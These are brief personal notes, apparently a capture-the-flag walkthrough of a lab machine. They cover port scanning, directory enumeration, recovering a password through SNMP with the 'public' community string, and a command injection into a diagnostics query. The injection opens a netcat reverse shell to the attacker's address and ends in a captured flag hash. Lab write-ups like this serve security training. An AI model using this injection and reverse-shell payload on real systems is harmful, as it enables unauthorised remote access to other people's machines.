#10.10.10.105
#PORT - 80, 22(ssh), 161(snmp)


#nmap full UDP scan
#dirb - /doc , /tools

#found 2 files inside /doc folder
error_codes.pdf,  diagram_for_tac.png

#got username(admin) from .pdf file

#search about chassis serial number string
#enumerate
snmpwalk -c public 10.10.10.105 -v 2c     =>  SN#NET_45JDX23
#passwd= NET_45JDX23
#user= admin

#alter the query of 'Verify status' inside 'Diagnostics' tab
quagga;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.12.99 4444 >/tmp/f
(encode as base64)


#user.txt
5649c41df59fd6efdc4a78d79a07f2be
